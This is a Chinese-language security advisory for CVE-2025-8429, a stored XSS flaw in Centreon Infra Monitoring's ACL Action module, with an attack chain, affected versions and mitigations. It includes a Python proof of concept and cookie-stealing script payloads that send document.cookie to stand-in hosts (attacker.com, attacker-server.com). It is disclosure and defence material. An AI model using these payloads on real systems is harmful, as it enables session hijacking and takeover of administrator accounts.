CVE-2025-8429 Centreon Infra Monitoring ACL模块存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-8429

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

6.8 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Centreon Infra Monitoring

漏洞概述

CVE-2025-8429是Centreon Infra Monitoring监控平台中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞位于ACL（访问控制列表）Action访问配置模块中，属于网页生成过程中输入清理不当（Improper Neutralization of Input During Web Page Generation）所导致的安全问题。

Centreon是一款广泛使用的开源IT基础设施监控软件，被大量企业用于监控网络设备、服务器和应用程序的运行状态。该漏洞允许具有提升权限的用户在ACL Action配置模块中注入恶意的JavaScript脚本代码，这些代码会被持久化存储在服务器端。当其他用户（尤其是具有查看权限的管理员）访问受影响的页面时，恶意脚本将在其浏览器中自动执行，从而窃取敏感信息（如会话Cookie、认证令牌等）。

该漏洞的CVSS 3.1评分为6.8分，属于中等严重级别。虽然利用该漏洞需要高权限（PR:H），但由于Centreon作为企业级监控平台通常包含大量敏感的配置信息和凭据数据，一旦被利用，攻击者可以获取到大量高价值信息，对企业安全构成严重威胁。漏洞影响范围涵盖Centreon Infra Monitoring的多个版本，包括24.10.x、24.04.x和23.10.x三个主要分支。

技术细节

该漏洞的核心问题在于ACL Action访问配置模块在处理用户输入时未进行充分的输出编码和输入验证。具体技术原理如下：

1. **输入注入点**：攻击者在ACL Action配置模块的输入字段（如Action名称、描述、别名等）中插入恶意的JavaScript代码，例如`<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>`。

2. **存储机制**：由于缺乏适当的输入清理，恶意脚本被直接存储到数据库中，而未进行HTML实体编码或转义处理。

3. **输出渲染**：当其他管理员或用户查看ACL配置页面时，服务器从数据库中读取存储的数据并直接嵌入到HTML响应中，浏览器将其解析为可执行的JavaScript代码。

4. **权限要求**：攻击者需要具有提升的权限（PR:H），这意味着普通用户无法直接利用，但已获得一定权限的内部威胁或被入侵的低权限账户可以利用此漏洞进行权限提升或横向移动。

5. **影响范围**：由于是存储型XSS，恶意代码会在每次页面加载时执行，影响所有访问受影响页面的用户，具有持久性和广泛传播性。

6. **攻击场景**：典型的攻击场景包括窃取管理员会话Cookie、进行钓鱼攻击、重定向到恶意网站、或利用管理员权限执行进一步的攻击操作。

攻击链分析

STEP 1

步骤1：获取初始权限

攻击者首先需要获得Centreon平台的具有一定权限的账户。这可以通过钓鱼攻击、利用其他漏洞、或内部威胁等方式实现。

STEP 2

步骤2：登录并导航到ACL配置模块

使用获取的凭证登录Centreon管理界面，导航到配置 > ACL > Actions访问配置模块。

STEP 3

步骤3：注入恶意XSS载荷

在ACL Action配置的输入字段（如名称或描述）中插入恶意的JavaScript代码，例如窃取Cookie或重定向到外部恶意站点的脚本。

STEP 4

步骤4：恶意脚本持久化存储

由于缺乏输入清理，恶意脚本被保存到数据库中，成为存储型XSS。

STEP 5

步骤5：等待受害者访问

当管理员或其他高权限用户查看ACL Action配置页面时，恶意脚本自动执行。

STEP 6

步骤6：窃取敏感信息

恶意脚本窃取受害者的会话Cookie、认证令牌或其他敏感信息，发送到攻击者控制的服务器。

STEP 7

步骤7：利用窃取的信息进行进一步攻击

攻击者利用窃取的会话信息冒充受害者，获取更高的系统访问权限，执行进一步的攻击操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-8429 - Centreon Infra Monitoring ACL Module Stored XSS PoC
# This PoC demonstrates the stored XSS vulnerability in ACL Action access configuration modules

import requests
from bs4 import BeautifulSoup

# Target Centreon server configuration
TARGET_URL = "https://target-centreon-server.example.com"
USERNAME = "attacker_user"
PASSWORD = "attacker_password"

# Step 1: Authenticate to Centreon
session = requests.Session()
login_url = f"{TARGET_URL}/centreon/api/latest/login"
login_data = {
    "security": {
        "credentials": {
            "login": USERNAME,
            "password": PASSWORD
        }
    }
}

response = session.post(login_url, json=login_data, verify=False)
print(f"[*] Login response status: {response.status_code}")

# Step 2: Inject malicious XSS payload into ACL Action configuration
# The payload will steal session cookies when executed in victim's browser
xss_payload = "<script>fetch('https://attacker-server.com/steal?cookie='+document.cookie)</script>"

acl_action_url = f"{TARGET_URL}/centreon/api/latest/configuration/acl/action"
acl_data = {
    "name": xss_payload,
    "description": "Legitimate looking description",
    "acl_group": {"id": 1},
    "actions": [{"id": 1}]
}

response = session.post(acl_action_url, json=acl_data, verify=False)
print(f"[*] XSS payload injection status: {response.status_code}")

# Step 3: Verify the payload was stored
response = session.get(acl_action_url, verify=False)
if xss_payload in response.text:
    print("[+] XSS payload successfully stored in ACL Action configuration")
    print("[+] When admin views the ACL configuration page, the script will execute")

# Note: This vulnerability requires elevated privileges (PR:H)
# The injected script will execute in the context of any user viewing the ACL Action page

影响范围

Centreon Infra Monitoring >= 24.10.0, < 24.10.13

Centreon Infra Monitoring >= 24.04.0, < 24.04.18

Centreon Infra Monitoring >= 23.10.0, < 23.10.28

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制能够访问ACL Action配置模块的用户数量，仅授予必要的最小权限；2）定期审计ACL配置中的可疑条目，特别是包含HTML或JavaScript代码的字段；3）实施Web应用防火墙（WAF）规则，阻止包含可疑脚本标签的请求；4）启用内容安全策略（CSP）头部，限制页面中可执行的脚本来源；5）监控异常的出站网络连接，及时发现数据泄露行为；6）对所有用户输入实施白名单验证，拒绝包含特殊字符的输入。